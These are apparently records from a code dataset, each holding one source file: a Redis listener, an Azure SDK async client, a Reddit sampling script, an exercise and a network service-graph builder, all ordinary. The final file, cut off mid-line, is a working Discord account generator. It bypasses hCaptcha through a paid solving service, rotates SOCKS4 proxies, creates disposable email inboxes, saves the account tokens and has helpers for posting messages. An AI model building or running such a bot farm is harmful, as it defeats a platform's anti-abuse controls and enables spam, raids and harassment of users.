res\n","sub_path":"project_task_count_calendar_event/models/project_project.py","file_name":"project_project.py","file_ext":"py","file_size_in_byte":2104,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"555498831","text":"import redis\nimport json\nfrom decouple import config\n\nREDIS_HOST = config('REDIS_HOST')\nREDIS_PORT = config('REDIS_PORT')\nREDIS_DB = config('REDIS_DB')\nredis_url = f'redis://{REDIS_HOST}:{REDIS_PORT}/{REDIS_DB}'\nchannel = 'logger'\n\nclass PubSubListener(object):\n def __init__(self):\n self.clients = []\n self._connection()\n def _connection(self):\n self.pubsub = redis.StrictRedis.from_url(redis_url, decode_responses=True).pubsub(\n ignore_subscribe_messages=False)\n self.pubsub.subscribe(**{channel: self.handler})\n self.thread = self.pubsub.run_in_thread(sleep_time=0.001)\n def register(self, client):\n self.clients.append(client)\n\n def handler(self, message):\n _message = message['data']\n print(_message)\n if type(_message) != int:\n self.send(_message)\n\n\n def send(self, data):\n for client in self.clients:\n try:\n client.send(data)\n except Exception:\n self.clients.remove(client)\n\nclass RedisChache:\n def __init__(self):\n self._connection()\n\n def _connection(self):\n self.connect = redis.StrictRedis.from_url(redis_url, decode_responses=True)","sub_path":"logs-service/snake-vision-sockets-consumer/RedisListener.py","file_name":"RedisListener.py","file_ext":"py","file_size_in_byte":1222,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"538792917","text":"# --------------------------------------------------------------------------\n#\n# Copyright (c) Microsoft Corporation. All rights reserved.\n#\n# The MIT License (MIT)\n#\n# Permission is hereby granted, free of charge, to any person obtaining a copy\n# of this software and associated documentation files (the \"\"Software\"\"), to\n# deal in the Software without restriction, including without limitation the\n# rights to use, copy, modify, merge, publish, distribute, sublicense, and/or\n# sell copies of the Software, and to permit persons to whom the Software is\n# furnished to do so, subject to the following conditions:\n#\n# The above copyright notice and this permission notice shall be included in\n# all copies or substantial portions of the Software.\n#\n# THE SOFTWARE IS PROVIDED *AS IS*, WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. 
IN NO EVENT SHALL THE\n# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING\n# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS\n# IN THE SOFTWARE.\n#\n# --------------------------------------------------------------------------\n\nimport logging\nimport os\nimport sys\ntry:\n from urlparse import urljoin, urlparse\nexcept ImportError:\n from urllib.parse import urljoin, urlparse\nimport warnings\nimport xml.etree.ElementTree as ET\n\nfrom typing import List, Any, Dict, Union, IO, Tuple, Optional, Callable, Iterator, cast, TYPE_CHECKING # pylint: disable=unused-import\n\nfrom .pipeline import AsyncPipeline\nfrom .pipeline.policies import ContentDecodePolicy\nfrom .pipeline.transport import HttpRequest, AioHttpTransport\n\n_LOGGER = logging.getLogger(__name__)\n\nclass AsyncPipelineClient(object):\n \"\"\"Service client core methods.\n\n This contains methods that are sans I/O and are not tied to a sync or async implementation.\n :param Configuration config: Service configuration.\n \"\"\"\n\n def __init__(self, base_url, config, **kwargs):\n if config is None:\n raise ValueError(\"Config is a required parameter\")\n self._config = config\n self._base_url = base_url\n if kwargs.get('pipeline'):\n self._pipeline = kwargs['pipeline']\n else:\n transport = kwargs.get('transport')\n if not transport:\n transport = AioHttpTransport(config, **kwargs)\n self._pipeline = self._build_pipeline(config, transport)\n\n def _build_pipeline(self, config, transport):\n policies = [\n config.headers_policy,\n config.user_agent_policy,\n ContentDecodePolicy(),\n config.redirect_policy,\n config.retry_policy,\n config.custom_hook_policy,\n config.logging_policy,\n ]\n return AsyncPipeline(transport, policies)\n\n def _request(self, method, url, params, headers, content, form_content, stream_content):\n # type: (str, str, Optional[Dict[str, str]], Optional[Dict[str, str]], Any, Optional[Dict[str, Any]]) -> HttpRequest\n \"\"\"Create HttpRequest object.\n\n :param str url: URL for the request.\n :param dict params: URL query parameters.\n :param dict headers: Headers\n :param dict form_content: Form content\n \"\"\"\n request = HttpRequest(method, self.format_url(url))\n\n if params:\n request.format_parameters(params)\n\n if headers:\n request.headers.update(headers)\n\n if content is not None:\n if isinstance(content, ET.Element):\n request.set_xml_body(content)\n else:\n try:\n request.set_json_body(content)\n except TypeError:\n request.data = content\n\n if form_content:\n request.set_formdata_body(form_content)\n elif stream_content:\n request.set_streamed_data_body(stream_content)\n\n return request\n\n def format_url(self, url_template, **kwargs):\n # type: (str, Any) -> str\n \"\"\"Format request URL with the client base URL, unless the\n supplied URL is already absolute.\n\n :param str url_template: The request URL to be formatted if necessary.\n \"\"\"\n url = url_template.format(**kwargs)\n parsed = urlparse(url)\n if not parsed.scheme or not parsed.netloc:\n url = url.lstrip('/')\n base = self._base_url.format(**kwargs).rstrip('/')\n url = urljoin(base + '/', url)\n return url\n\n def get(self, url, params=None, headers=None, content=None, form_content=None):\n # type: (str, Optional[Dict[str, str]], Optional[Dict[str, str]], Any, Optional[Dict[str, Any]]) -> HttpRequest\n \"\"\"Create a GET request object.\n\n :param str url: The request URL.\n :param dict params: Request URL 
parameters.\n :param dict headers: Headers\n :param dict form_content: Form content\n \"\"\"\n request = self._request('GET', url, params, headers, content, form_content, None)\n request.method = 'GET'\n return request\n\n def put(self, url, params=None, headers=None, content=None, form_content=None, stream_content=None):\n # type: (str, Optional[Dict[str, str]], Optional[Dict[str, str]], Any, Optional[Dict[str, Any]]) -> HttpRequest\n \"\"\"Create a PUT request object.\n\n :param str url: The request URL.\n :param dict params: Request URL parameters.\n :param dict headers: Headers\n :param dict form_content: Form content\n \"\"\"\n request = self._request('PUT', url, params, headers, content, form_content, stream_content)\n return request\n\n def post(self, url, params=None, headers=None, content=None, form_content=None, stream_content=None):\n # type: (str, Optional[Dict[str, str]], Optional[Dict[str, str]], Any, Optional[Dict[str, Any]]) -> HttpRequest\n \"\"\"Create a POST request object.\n\n :param str url: The request URL.\n :param dict params: Request URL parameters.\n :param dict headers: Headers\n :param dict form_content: Form content\n \"\"\"\n request = self._request('POST', url, params, headers, content, form_content, stream_content)\n return request\n\n def head(self, url, params=None, headers=None, content=None, form_content=None, stream_content=None):\n # type: (str, Optional[Dict[str, str]], Optional[Dict[str, str]], Any, Optional[Dict[str, Any]]) -> HttpRequest\n \"\"\"Create a HEAD request object.\n\n :param str url: The request URL.\n :param dict params: Request URL parameters.\n :param dict headers: Headers\n :param dict form_content: Form content\n \"\"\"\n request = self._request('HEAD', url, params, headers, content, form_content, None)\n return request\n\n def patch(self, url, params=None, headers=None, content=None, form_content=None, stream_content=None):\n # type: (str, Optional[Dict[str, str]], Optional[Dict[str, str]], Any, Optional[Dict[str, Any]]) -> HttpRequest\n \"\"\"Create a PATCH request object.\n\n :param str url: The request URL.\n :param dict params: Request URL parameters.\n :param dict headers: Headers\n :param dict form_content: Form content\n \"\"\"\n request = self._request('PATCH', url, params, headers, content, form_content, stream_content)\n return request\n\n def delete(self, url, params=None, headers=None, content=None, form_content=None):\n # type: (str, Optional[Dict[str, str]], Optional[Dict[str, str]], Any, Optional[Dict[str, Any]]) -> HttpRequest\n \"\"\"Create a DELETE request object.\n\n :param str url: The request URL.\n :param dict params: Request URL parameters.\n :param dict headers: Headers\n :param dict form_content: Form content\n \"\"\"\n request = self._request('DELETE', url, params, headers, content, form_content, None)\n return request\n\n def merge(self, url, params=None, headers=None, content=None, form_content=None):\n # type: (str, Optional[Dict[str, str]], Optional[Dict[str, str]], Any, Optional[Dict[str, Any]]) -> HttpRequest\n \"\"\"Create a MERGE request object.\n\n :param str url: The request URL.\n :param dict params: Request URL parameters.\n :param dict headers: Headers\n :param dict form_content: Form content\n \"\"\"\n request = self._request('MERGE', url, params, headers, content, form_content, None)\n return request\n\n async def __aenter__(self):\n await self._pipeline.__aenter__()\n return self\n\n async def __aexit__(self, *args):\n await self.close()\n\n async def close(self):\n await 
self._pipeline.__aexit__()","sub_path":"sdk/core/azure-core/azure/core/pipeline_client_async.py","file_name":"pipeline_client_async.py","file_ext":"py","file_size_in_byte":8885,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"602159629","text":"from pymongo import MongoClient\nimport datetime\nimport csv\n\nclient = MongoClient(\"localhost\", 27017)\ndb = client.reddit\n\n\ntime_start = datetime.datetime.now()\ntime_end = datetime.datetime.now()\nelapsed_time = time_end - time_start\n\noutput_file_one_or_less = open(\"one_or_less_comments.csv\", 'w')\n\ndef timing():\n\tglobal time_start\n\tglobal time_end\n\tglobal elapsed_time\n\tprint(\"Started: \", time_start)\n\tprint(\"Finished: \", time_end)\n\tprint(\"Time difference: \", elapsed_time)\n\n\tprint(divmod(elapsed_time.total_seconds(), 60))\n\n\ndef get_sample_data(collection, sample_percent):\n\tsample_data_file = open((str(collection) + \".csv\"), 'w')\n\tprint(\"starting to get sample data from '\" + str(collection) + \"' with sample size '\" + str(sample_percent) + \"' and writing to '\" + str(sample_data_file) + \"'\")\n\tlink_cursor = collection.find({}, {\"link_id\": True})\n\n\tsample_size = int(link_cursor.count() * sample_percent/100)\n\tsample_data_dict = {}\n\tlink_id_dict = {}\n\n\tfor link_id in link_cursor:\n\t\tif len(link_id_dict) >= sample_size:\n\t\t\tbreak\n\t\telse:\n\t\t\tlink_id_dict[link_id['link_id']] = 1\n\n\tcounter = 0\n\tdict_size = len(link_id_dict)\n\tpercent_done = 0\n\tkeys_done = 0\n\tnum_of_fails = 0\n\n\tsample_data_file = open(\"test123.csv\", 'wb')\n\n\twith sample_data_file:\n\t\tfor key in link_id_dict.keys():\n\t\t\tcursor = collection.find({'link_id': key})\n\t\t\tkeys_done += 1\n\t\t\tif (keys_done % int(dict_size / 20)) == 1:\n\t\t\t\tprint(percent_done)\n\t\t\t\tpercent_done += 5\n\n\t\t\tif cursor.count() <= 1:\n\t\t\t\tcounter += 1\n\n\t\t\tfor doc in cursor:\n\t\t\t\tcurr = \"\" + str(doc['_id']) + \",\" + str(doc['archived']) + \",\" + str(doc['author']) + \",\" + str(\n\t\t\t\t\tdoc['author_flair_css_class']) + \",\" + str(doc['author_flair_text']) + \",\" + str(\n\t\t\t\t\tdoc['body']) + \",\" + str(doc['controversiality']) + \",\" + str(doc['created_utc']) + \",\" + str(\n\t\t\t\t\tdoc['distinguished']) + \",\" + str(doc['downs']) + \",\" + str(doc['edited']) + \",\" + str(\n\t\t\t\t\tdoc['gilded']) + \",\" + str(doc['id']) + \",\" + str(doc['link_id']) + \",\" + str(doc['name']) + \",\" + str(\n\t\t\t\t\tdoc['parent_id']) + \",\" + str(doc['retrieved_on']) + \",\" + str(doc['score']) + \",\" + str(\n\t\t\t\t\tdoc['score_hidden']) + \",\" + str(doc['subreddit']) + \",\" + str(doc['subreddit_id']) + \",\" + str(\n\t\t\t\t\tdoc['ups']) + \"\\n\"\n\n\t\t\t\tsample_data_file.write(curr.encode(\"utf-8\"))\n\n\n\tprint(\"counter: \", counter)\n\tprint(\"collectionsize: \", link_cursor.count())\n\tprint(\"samplesize: \", sample_size)\n\tprint(\"num of fails: \", num_of_fails)\n\n\toutput_file_one_or_less.write(str(collection) + \",\" + str(link_cursor.count()) + \",\" + str(sample_size) + \",\" + str(counter) + \"\\n\")\n\tsample_data_file.close()\n\n\nget_sample_data(db.comments_2008, 0.1)\ntime_end = datetime.datetime.now()\nelapsed_time = time_end - time_start\ntiming()\n\n# get_sample_data(db.comments_2009, 0.1)\n# time_end = datetime.datetime.now()\n# elapsed_time = time_end - time_start\n# timing()\n#\n# get_sample_data(db.comments_2010, 0.1)\n# time_end = datetime.datetime.now()\n# elapsed_time = time_end - time_start\n# 
timing()\n#\n# get_sample_data(db.comments_2011, 0.1)\n# time_end = datetime.datetime.now()\n# elapsed_time = time_end - time_start\n# timing()\n#\n# get_sample_data(db.comments_2012, 0.1)\n# time_end = datetime.datetime.now()\n# elapsed_time = time_end - time_start\n# timing()\n#\n# get_sample_data(db.comments_2013, 0.1)\n# time_end = datetime.datetime.now()\n# elapsed_time = time_end - time_start\n# timing()\n#\n# get_sample_data(db.comments_2014, 0.1)\n# time_end = datetime.datetime.now()\n# elapsed_time = time_end - time_start\n# timing()\n\noutput_file_one_or_less.close()\n","sub_path":"Scripts/testing/analyze_sample_data.py","file_name":"analyze_sample_data.py","file_ext":"py","file_size_in_byte":3515,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"501195341","text":"data = list()\nwith open('sampleData4/3.inp', 'r') as f:\n data = [int(x) for x in f.readlines()]\ndata = data[1:]\n\ndef bp(data):\n _buy = 0\n buy = 0\n sell = 0\n best = 0\n for time in range(1, len(data)):\n _best = data[time] - data[_buy]\n if _best > best:\n best = _best\n buy = _buy\n sell = time\n elif _best == best and _buy != buy and _buy > buy:\n buy = _buy\n sell = time\n elif _best <= 0:\n _buy = time\n\n return buy, sell\n\nbuy, sell = bp(data)\nprint(buy+1, sell+1)\n","sub_path":"과제/4주차과제/소스/allin_test4.py","file_name":"allin_test4.py","file_ext":"py","file_size_in_byte":575,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"440553599","text":"'''\nCreated on May 14, 2015\n\n@author: fabiomignini\n'''\nimport json\nimport logging\nimport time\n\nimport requests\nfrom requests.exceptions import Timeout\n\nfrom webContent.constants import *\nfrom exception import Unauthorized\nfrom slapp import instantiate, delete\n\n\ntimeout_after_instantiation = 20\nglobal_match_id = 0\ndefault_priority = \"10\"\ningress_endpoint = 'user_ingress'\negress_endpoint = 'user_egress'\ningress_port_id = \"User:0\"\negress_port_id = \"WAN:0\"\nswitch_ingress_port = \"L2Port:0\"\nswitch_egress_port = \"L2Port:1\"\n\nclass Node(object):\n def __init__(self, node_type, node_id, port_id=None):\n self.node_type = node_type\n self.node_id = node_id\n self.port_id = port_id\n \n def isVNF(self):\n if self.node_type == 'vnf':\n return True\n return False\n \n def isLAN(self):\n if self.node_type == 'lan':\n return True\n return False\n \n def isTrafficSplitter(self):\n if self.node_type == 'splittermerger':\n return True\n return False\n \n def isEndpoint(self):\n if self.node_type == 'endpoint':\n return True\n return False\n \n def setAsVNF(self):\n self.node_type = 'vnf'\n\n\n\ndef setFlowruleFromEndpoint(endpoint_id, match_id, vnf, port, priority=None):\n flowrule = {}\n flowrule['action'] = {}\n flowrule['action']['VNF'] = {}\n flowrule['action']['VNF']['id'] = vnf\n flowrule['action']['VNF']['port'] = port\n flowrule['action']['type'] = \"output\"\n flowrule['flowspec'] = {}\n flowrule['flowspec']['matches'] = []\n match = {}\n if priority is None:\n match['priority'] = default_priority\n else:\n match['priority'] = priority\n match['id'] = match_id\n flowrule['flowspec']['matches'].append(match)\n flowrule['flowspec']['ingress_endpoint'] = endpoint_id\n return flowrule\n\ndef setFlowruleToEndpoint(endpoint_id, match_id, priority=None):\n flowrule = {}\n flowrule['action'] = {}\n flowrule['action']['endpoint'] = {}\n flowrule['action']['endpoint']['id'] = endpoint_id\n flowrule['action']['type'] = \"output\"\n 
flowrule['flowspec'] = {}\n flowrule['flowspec']['matches'] = []\n match = {}\n if priority is None:\n match['priority'] = default_priority\n else:\n match['priority'] = priority\n match['id'] = match_id\n flowrule['flowspec']['matches'].append(match)\n return flowrule\n\ndef setFlowruleToVNF(output_vnf, output_port, match_id, flowspec=None):\n flowrule = {}\n flowrule['action'] = {}\n flowrule['action']['VNF'] = {}\n flowrule['action']['VNF']['id'] = output_vnf\n flowrule['action']['VNF']['port'] = output_port\n flowrule['action']['type'] = \"output\"\n flowrule['flowspec'] = {}\n flowrule['flowspec']['matches'] = []\n match = {}\n \n match['priority'] = default_priority\n \n match['id'] = match_id\n flowrule['flowspec']['matches'].append(match)\n return flowrule\n \ndef createFlowrule(node_a, node_b, vnf_id, port_id, outgoing_flowrules_obj, ingoing_flowrules_obj):\n # Warning: in the NFFG in use, can't be directly connected two end-points\n global global_match_id\n if node_a.isVNF() and node_a.node_id == vnf_id and node_a.port_id == port_id:\n if node_b.isVNF():\n # TODO: match id\n outgoing_flowrules_obj.append(setFlowruleToVNF(node_b.node_id, str(node_b.port_id), str(global_match_id)))\n global_match_id = global_match_id + 1\n if node_b.isEndpoint():\n # TODO: match id\n outgoing_flowrules_obj.append(setFlowruleToEndpoint(node_b.node_id, str(global_match_id)))\n global_match_id = global_match_id + 1\n ingoing_flowrules_obj.append(setFlowruleFromEndpoint(node_b.node_id, str(global_match_id), node_a.node_id, str(node_a.port_id)))\n global_match_id = global_match_id + 1\n \ndef createGraph(vnf_list, user_id, encode=True): \n # TODO: if no one vnfs in list, I should add a switch default vm\n nffg = {}\n nffg['profile'] = {}\n nffg['profile']['id'] = user_id\n nffg['profile']['name'] = user_id\n vnfs = []\n for index, vnf in enumerate(vnf_list):\n if vnf['psa_id'] == \"switch\":\n _ingress_port_id = switch_ingress_port\n _egress_port_id = switch_egress_port\n else:\n _ingress_port_id = ingress_port_id\n _egress_port_id = egress_port_id\n \n vnf_obj = {}\n vnf_obj['vnf_descriptor'] = vnf['psa_id'] + '.json'\n vnf_obj['id'] = vnf['psa_id']\n vnf_obj['name'] = vnf['psa_id']\n vnf_obj['ports'] = []\n if index == 0:\n port_obj = {}\n port_obj['id'] = _ingress_port_id\n outgoing_flowrules_obj = []\n ingoing_flowrules_obj = []\n node1 = Node('endpoint', ingress_endpoint)\n node2 = Node('vnf', vnf['psa_id'], _ingress_port_id)\n else:\n port_obj = {}\n port_obj['id'] = _ingress_port_id\n outgoing_flowrules_obj = []\n ingoing_flowrules_obj = []\n node1 = Node('vnf', vnf_list[index - 1]['psa_id'], _egress_port_id)\n node2 = Node('vnf', vnf['psa_id'], _ingress_port_id)\n \n createFlowrule(node1, node2, vnf['psa_id'], _ingress_port_id, outgoing_flowrules_obj, ingoing_flowrules_obj)\n createFlowrule(node2, node1, vnf['psa_id'], _ingress_port_id, outgoing_flowrules_obj, ingoing_flowrules_obj)\n if len(outgoing_flowrules_obj) != 0:\n port_obj['outgoing_label'] = {}\n port_obj['outgoing_label']['flowrules'] = outgoing_flowrules_obj\n if len(ingoing_flowrules_obj) != 0:\n port_obj['ingoing_label'] = {}\n port_obj['ingoing_label']['flowrules'] = ingoing_flowrules_obj\n vnf_obj['ports'].append(port_obj)\n \n if index == (len(vnf_list) - 1):\n port_obj = {}\n port_obj['id'] = _egress_port_id\n outgoing_flowrules_obj = []\n ingoing_flowrules_obj = []\n node1 = Node('vnf', vnf['psa_id'], _egress_port_id)\n node2 = Node('endpoint', egress_endpoint)\n else:\n port_obj = {}\n port_obj['id'] = _egress_port_id\n 
outgoing_flowrules_obj = []\r\n ingoing_flowrules_obj = []\r\n node1 = Node('vnf', vnf['psa_id'], _egress_port_id)\r\n node2 = Node('vnf', vnf_list[index + 1]['psa_id'], _ingress_port_id)\r\n \r\n createFlowrule(node1, node2, vnf['psa_id'], _egress_port_id, outgoing_flowrules_obj, ingoing_flowrules_obj)\r\n createFlowrule(node2, node1, vnf['psa_id'], _egress_port_id, outgoing_flowrules_obj, ingoing_flowrules_obj) \r\n if len(outgoing_flowrules_obj) != 0:\r\n port_obj['outgoing_label'] = {}\r\n port_obj['outgoing_label']['flowrules'] = outgoing_flowrules_obj\r\n if len(ingoing_flowrules_obj) != 0:\r\n port_obj['ingoing_label'] = {}\r\n port_obj['ingoing_label']['flowrules'] = ingoing_flowrules_obj\r\n vnf_obj['ports'].append(port_obj)\r\n \r\n vnfs.append(vnf_obj)\r\n nffg['profile']['VNFs'] = vnfs\r\n endpoints = []\r\n \r\n # End points\r\n endpoint_obj = {}\r\n endpoint_obj['id'] = ingress_endpoint\r\n endpoint_obj['name'] = 'INGRESS'\r\n endpoints.append(endpoint_obj)\r\n endpoint_obj = {}\r\n endpoint_obj['id'] = egress_endpoint\r\n endpoint_obj['name'] = 'EGRESS'\r\n endpoints.append(endpoint_obj)\r\n \r\n nffg['profile']['endpoints'] = endpoints\r\n if encode:\r\n return json.dumps(nffg, sort_keys=True).encode()\r\n else:\r\n return nffg\r\n\r\ndef putServiceGraphInKeystone(token, user_id, graph):\r\n data = json.dumps(graph)\r\n headers = {'Accept': 'application/json', 'Content-Type': 'application/json', 'X-Auth-Token': token}\r\n resp = requests.post(URL_SERVICE_GRAPH + user_id, headers=headers, data=data, timeout=TIMEOUT)\r\n if resp.status_code == 401:\r\n logging.error(\"Keystone returns 401 unauthorized\")\r\n raise Unauthorized('Keystone returns 401 Unauthorized')\r\n resp.raise_for_status()\r\n return resp.text\r\n\r\ndef waitInstantiation(token=None):\r\n try:\r\n while True:\r\n headers = {'Accept': 'application/json', 'Content-Type': 'application/json', 'X-Auth-Token': token}\r\n resp = requests.get(SERVICE_LAYER, headers=headers, timeout=(TIMEOUT))\r\n if resp.status_code == 201:\r\n break\r\n elif resp.status_code == 202:\r\n continue\r\n elif resp.status_code == 401:\r\n logging.error(\"Orchestrator returns 401 unauthorized\")\r\n raise Unauthorized('Orchestrator returns 401 Unauthorized')\r\n else:\r\n logging.error('Orchestrator returns ' + str(resp.status_code))\r\n raise Exception('Orchestrator returns ' + str(resp.status_code))\r\n except Timeout as err:\r\n logging.error(\"Orchestrator request timeout\")\r\n raise err\r\n \r\ndef saveAndInstantiateServiceGraph(session, vnfs):\r\n '''\r\n Create a Service graph for a user, and trigger its instantiation in the SLApp\r\n '''\r\n \r\n # Create a list of selected apps\r\n active_vnfs = []\r\n for vnf in vnfs['list']:\r\n if vnf['checked'] == 1:\r\n active_vnfs.append(vnf)\r\n \r\n \r\n if len(active_vnfs) == 0:\r\n psa = {}\r\n psa['psa_name'] = \"switch\"\r\n psa['psa_id'] = \"switch\"\r\n active_vnfs.append(psa)\r\n \r\n graph = createGraph(active_vnfs, vnfs['user'], False)\r\n \r\n # Put the service graph in keystone\r\n putServiceGraphInKeystone(session['token'], session['user_id'], graph) \r\n \r\n instantiate(session['token'])\r\n waitInstantiation(session['token'])\r\n # delete(session['token'])\r\n logging.debug(\"Service graph instantiated\")\r\n 
time.sleep(timeout_after_instantiation)\n \n\n\n\n\n \n","sub_path":"webContent/modules/service_graph.py","file_name":"service_graph.py","file_ext":"py","file_size_in_byte":10432,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"217620835","text":"from requests import get, post, Session\r\nfrom random import randint, choice,randrange\r\nfrom re import findall, sub\r\nfrom websocket import WebSocket\r\nfrom string import ascii_lowercase, digits\r\nfrom concurrent.futures import ThreadPoolExecutor\r\nfrom time import sleep\r\nfrom json import loads,dumps,load\r\nfrom flask import Flask, request\r\nfrom flask_cors import CORS\r\n#from os import system, name\r\n\r\n# load config\r\nconfig = load(open('config.json', encoding='utf-8'))\r\nproxy_list = open(config['proxy_file_name'], encoding='utf-8').readlines()\r\nproxy_num = 0\r\n# init flask\r\napp = Flask(__name__, static_url_path='/html')\r\nCORS(app)\r\ntoken_am = 0\r\nver_m = False\r\nver_p = False\r\nonline_tf = False\r\nonline_msg = \"czloed Dhub\"\r\nlivesteam_tf = False\r\nlivesteam_ch = None\r\nlivesteam_g = None\r\nrunn = False\r\n# init threadpool\r\nexecutor = ThreadPoolExecutor(max_workers=int(10000))\r\n\r\ndef headers(token=None, fingerprint=None, mail=False,xsu=None,useragent=None, referrer=\"https://discord.com/channels/@me\") :\r\n if token :\r\n if mail :\r\n return {'Content-Type': 'application/json','user-agent': 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.122 Safari/537.36', 'authorization': \"Bearer \" + token}\r\n else :\r\n head = {'origin': 'https://discord.com', 'Accept': '*/*','Accept-Language': 'en-US', 'Content-Type': 'application/json','user-agent': 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) discord/0.1.7 Chrome/83.0.4103.122 Electron/9.4.4 Safari/537.36', 'authorization': token, 'x-super-properties': \"eyJvcyI6IldpbmRvd3MiLCJicm93c2VyIjoiRGlzY29yZCBDbGllbnQiLCJyZWxlYXNlX2NoYW5uZWwiOiJzdGFibGUiLCJjbGllbnRfdmVyc2lvbiI6IjAuMS43Iiwib3NfdmVyc2lvbiI6IjEwLjAuMTgzNjMiLCJvc19hcmNoIjoieDY0Iiwic3lzdGVtX2xvY2FsZSI6ImVuLVVTIiwiY2xpZW50X2J1aWxkX251bWJlciI6ODgxODEsImNsaWVudF9ldmVudF9zb3VyY2UiOm51bGx9\"}\r\n if referrer :\r\n head[\"referrer\"] = referrer\r\n if useragent :\r\n head[\"user-agent\"] = useragent\r\n if xsu :\r\n head[\"x-super-properties\"] = xsu\r\n return head\r\n else :\r\n head = {'Content-Type': 'application/json','user-agent': 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.122 Safari/537.36'}\r\n if mail : \r\n return head\r\n head['x-super-properties'] = 'eyJvcyI6IldpbmRvd3MiLCJicm93c2VyIjoiQ2hyb21lIiwiZGV2aWNlIjoiIiwic3lzdGVtX2xvY2FsZSI6ImVuLVVTIiwiYnJvd3Nlcl91c2VyX2FnZW50IjoiTW96aWxsYS81LjAgKFdpbmRvd3MgTlQgMTAuMDsgV2luNjQ7IHg2NCkgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgQ2hyb21lLzkxLjAuNDQ3Mi4xMTQgU2FmYXJpLzUzNy4zNiBFZGcvOTEuMC44NjQuNTQiLCJicm93c2VyX3ZlcnNpb24iOiI5MS4wLjQ0NzIuMTE0Iiwib3NfdmVyc2lvbiI6IjEwIiwicmVmZXJyZXIiOiIiLCJyZWZlcnJpbmdfZG9tYWluIjoiIiwicmVmZXJyZXJfY3VycmVudCI6IiIsInJlZmVycmluZ19kb21haW5fY3VycmVudCI6IiIsInJlbGVhc2VfY2hhbm5lbCI6InN0YWJsZSIsImNsaWVudF9idWlsZF9udW1iZXIiOjg4MTgxLCJjbGllbnRfZXZlbnRfc291cmNlIjpudWxsfQ=='\r\n if fingerprint :\r\n head['x-fingerprint'] = fingerprint\r\n return head\r\n \r\n#def clear():\r\n# system('cls' if name=='nt' else 'clear')\r\n\r\n\r\ndef asciigen(length):\r\n asc = ''\r\n for x in range(int(length)):\r\n num = randrange(13000)\r\n asc = asc + chr(num)\r\n 
return asc\r\n\r\ndef get_bal():\r\n return post('https://api.capmonster.cloud/getBalance',timeout=5,json={\"clientKey\": config['cap_key']}).json()['balance']\r\n\r\ndef randomstr(n):\r\n\treturn ''.join(choice(ascii_lowercase + digits) for _ in range(n))\r\n\r\ndef randomint(n):\r\n return str(randint(10**(n-1), (10**n)-1))\r\n\r\ndef get_fingerprint():\r\n return get(\"https://discord.com/api/v9/experiments\", headers=headers()).json()[\"fingerprint\"]\r\n\r\ndef sendmsg(msg, chid, guild_id, token):\r\n post(f\"https://discord.com/api/v9/channels/{chid}/messages\", json={\"content\":msg,\"nonce\":randomint(18),\"tts\":False}, headers=headers(token, referrer=f\"https://discord.com/channels/{guild_id}/{chid}\"))\r\n\r\ndef get_proxy():\r\n global proxy_num,proxy_list\r\n try :\r\n proxy = proxy_list[proxy_num]\r\n proxy_num+=1\r\n except:\r\n proxy = proxy_list[0]\r\n proxy_num=0\r\n return proxy.replace('\\n','')\r\n\r\n\r\ndef get_captcha_code():\r\n taskid = post('http://api.capmonster.cloud/createTask', json={\"clientKey\":config['cap_key'],\"task\":{\"type\":\"HCaptchaTaskProxyless\",\"websiteURL\":\"https://discord.com/register\",\"websiteKey\":\"f5561ba9-8f1e-40ca-9b5b-a0b3f719ef34\"}}).json()['taskId']\r\n sleep(1)\r\n while True:\r\n lest_res = post('http://api.capmonster.cloud/getTaskResult', json={\"clientKey\":config['cap_key'], 'taskId': taskid}).json()\r\n if lest_res['status'] == 'ready':\r\n return lest_res['solution']['gRecaptchaResponse']\r\n break\r\n sleep(2)\r\n\r\n# create zone\r\ndef token_gen(username,invite=config[\"invite_link\"], verify_mail=False, verify_phone=False, file_name=\"token\"):\r\n global token_am\r\n password = \"czloed_Dhub@\"\r\n register_payload = {\"fingerprint\":\"\",\"email\": randomstr(randint(3, 6)) + randomint(randint(3, 5)) + \"@gmail.com\",\"username\":username,\"password\": password,\"invite\":invite,\"consent\":True,\"date_of_birth\":\"1999-06-10\",\"gift_code_sku_id\":\"\",\"captcha_key\":\"\"}\r\n \r\n if verify_mail :\r\n mail_domain = get(\"https://api.mail.tm/domains\", headers=headers(mail=True)).json()[\"hydra:member\"][0][\"domain\"]\r\n mail = f\"{username}@{mail_domain}\"\r\n post(\"https://api.mail.tm/accounts\",json={\"address\":mail,\"password\":password}, headers=headers(mail=True))\r\n register_payload[\"email\"] = mail\r\n mail_token = post(\"https://api.mail.tm/token\",json={\"address\":mail,\"password\":password}, headers=headers(mail=True)).json()[\"token\"]\r\n #fingerprint = get_fingerprint()\r\n #register_payload[\"fingerprint\"] = fingerprint\r\n register_payload[\"captcha_key\"] = get_captcha_code()\r\n while True:\r\n proxy = {'https': f\"socks4://{get_proxy()}\"}\r\n try :\r\n textres = post(\"https://discord.com/api/v9/auth/register\", timeout=5,proxies=proxy, json=register_payload, headers=headers(referrer=\"https://discord.com/register\")).json()#, fingerprint=fingerprint\r\n discord_token = textres[\"token\"]\r\n print(\"[token gen] I Got token | \" + discord_token)\r\n a = open(f'{file_name}.txt', 'a')\r\n a = a.write(f\"{discord_token}\\n\")\r\n token_am += 